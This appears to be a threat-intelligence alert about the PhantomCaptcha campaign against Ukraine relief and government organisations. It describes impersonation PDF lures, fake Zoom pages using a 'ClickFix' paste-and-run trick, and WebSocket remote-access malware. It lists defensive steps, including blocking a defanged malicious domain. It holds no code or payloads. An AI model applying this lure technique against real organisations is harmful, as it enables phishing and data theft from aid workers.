PhantomCaptcha Campaign Targets Ukraine Relief Organizations
Category:Threat Alerts / Threat Intelligence
SentinelLabs uncovered the PhantomCaptcha campaign targeting humanitarian and government organizations involved in Ukraine relief efforts. Attackers impersonated the Ukrainian President’s Office using PDF lures to deliver multi-stage malware via fake Zoom pages hosted on Russian infrastructure. The final payload enabled reconnaissance, command execution, and data exfiltration through WebSocket-based RATs. The campaign operated briefly to evade detection while maintaining persistent backend servers for control.
CORTEX Protocol Intelligence Assessment
Business Impact: The targeting of humanitarian and relief organizations underscores the exploitation of global crises by advanced threat actors. Technical Context: PhantomCaptcha leverages social engineering (‘ClickFix’ technique) and short-lived infrastructures, indicating disciplined operational security by a state-aligned actor.
Strategic Intelligence Guidance
- Train NGO and humanitarian staff to identify phishing via impersonation lures.
- Block malicious domains (e.g., zoomconference[.]app) and track infrastructure overlap.
- Deploy PowerShell execution restrictions to prevent ‘Paste-and-Run’ abuse.
- Enforce content-disarm solutions for PDF attachments.
Vendors
Threats
Targets
Intelligence Source: PhantomCaptcha Campaign Targets Ukraine Relief Organizations | Oct 23, 2025